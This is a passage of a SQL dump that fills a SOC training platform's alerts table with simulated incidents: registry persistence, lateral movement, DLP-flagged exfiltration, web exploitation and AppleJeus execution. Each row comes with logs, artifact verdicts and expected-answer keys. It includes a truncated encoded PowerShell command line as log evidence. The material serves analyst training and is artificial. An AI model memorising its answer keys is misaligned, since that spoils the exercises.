Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Andariel C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a known Andariel malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"invoice.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"suspicious\",\"details\":\"File used as a dropper in recent attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1353, 'Persistence Mechanism Established', 'medium', 'System Registry Monitoring', 'The malware modifies system registry keys to maintain persistence, allowing the attackers to retain access even after system reboots.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:27Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"modified_by_user\":\"jdoe_admin\",\"malware_filename\":\"evilapp.exe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_context\":\"SYSTEM\",\"description\":\"Persistence mechanism established via registry key modification.\"}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware hash associated with evilapp.exe.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"evilapp.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File used in persistence mechanism.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected for this user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.856Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T08:45:27Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"modified_by_user\\\":\\\"jdoe_admin\\\",\\\"malware_filename\\\":\\\"evilapp.exe\\\",\\\"malware_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user_context\\\":\\\"SYSTEM\\\",\\\"description\\\":\\\"Persistence mechanism established via registry key modification.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1354, 'Lateral Movement Detected', 'medium', 'Network Traffic Analysis', 'The attackers leverage stolen credentials to move laterally within the corporate network, targeting systems with access to sensitive defense sector data.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T10:32:45Z\",\"event_type\":\"network_connection\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.0.0.45\",\"protocol\":\"SMB\",\"username\":\"jdoe\",\"file_accessed\":\"\\\\\\\\10.0.0.45\\\\sensitive\\\\project_plan.docx\",\"external_attacker_ip\":\"203.0.113.15\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"access_granted\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with lateral movement activity\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"hash_lookup_service\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with abnormal file access patterns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1355, 'Sensitive Data Exfiltration', 'critical', 'Data Loss Prevention (DLP) Alerts', 'The attackers have initiated the exfiltration of sensitive intellectual property related to defense contracts and ATM transaction data to an external malicious server.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"alert_id\":\"DLP-EXFIL-00342\",\"source_ip\":\"10.1.2.34\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"filename\":\"defense_contract_2023.pdf\",\"hash\":\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\",\"username\":\"jdoe\",\"action\":\"exfiltrate\",\"status\":\"blocked\"}', '2026-03-01 23:01:37', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"defense_contract_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document flagged for unauthorized transfer.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in suspicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.859Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"alert_id\\\":\\\"DLP-EXFIL-00342\\\",\\\"source_ip\\\":\\\"10.1.2.34\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"filename\\\":\\\"defense_contract_2023.pdf\\\",\\\"hash\\\":\\\"3d2e479f4b2c3d1ea8f1f2d8a3e2b7d9\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltrate\\\",\\\"status\\\":\\\"blocked\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1356, 'Suspicious Access Attempt Detected', 'medium', 'Network IDS Logs', 'A suspicious access attempt was detected as BlueNoroff initiated a campaign by exploiting vulnerabilities in the target\'s web application. The objective was to gain unauthorized access to the cryptocurrency startup\'s network.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:12:07Z\",\"src_ip\":\"203.0.113.45\",\"dest_ip\":\"192.168.1.100\",\"src_port\":443,\"dest_port\":80,\"protocol\":\"HTTP\",\"alert\":\"Potential Exploit Detected\",\"signature_id\":\"2000011\",\"signature\":\"WEB-APP Remote Code Execution Vulnerability\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"uri\":\"/vulnerable_endpoint\",\"method\":\"POST\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used by BlueNoroff\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1357, 'Execution of Malicious Payload', 'high', 'Endpoint Security Logs', 'An endpoint has executed a payload associated with the AppleJeus malware, disguised as a cryptocurrency application. This execution could lead to unauthorized access and data exfiltration.', 'Execution', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"username\":\"jdoe\",\"process_name\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\CryptoTrader.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_description\":\"Process execution detected\",\"command_line\":\"\\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\CryptoTrader.exe\\\" -silent\",\"malware_family\":\"AppleJeus\",\"severity\":\"High\"}', '2026-03-01 23:02:16', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local host in corporate network\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\CryptoTrader.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Executable associated with AppleJeus malware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matched AppleJeus malware sample\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" -silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" -silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" -silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" -silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.863Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:31Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"username\\\":\\\"jdoe\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"Process execution detected\\\",\\\"command_line\\\":\\\"\\\\\\\"C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\CryptoTrader.exe\\\\\\\" -silent\\\",\\\"malware_family\\\":\\\"AppleJeus\\\",\\\"severity\\\":\\\"High\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
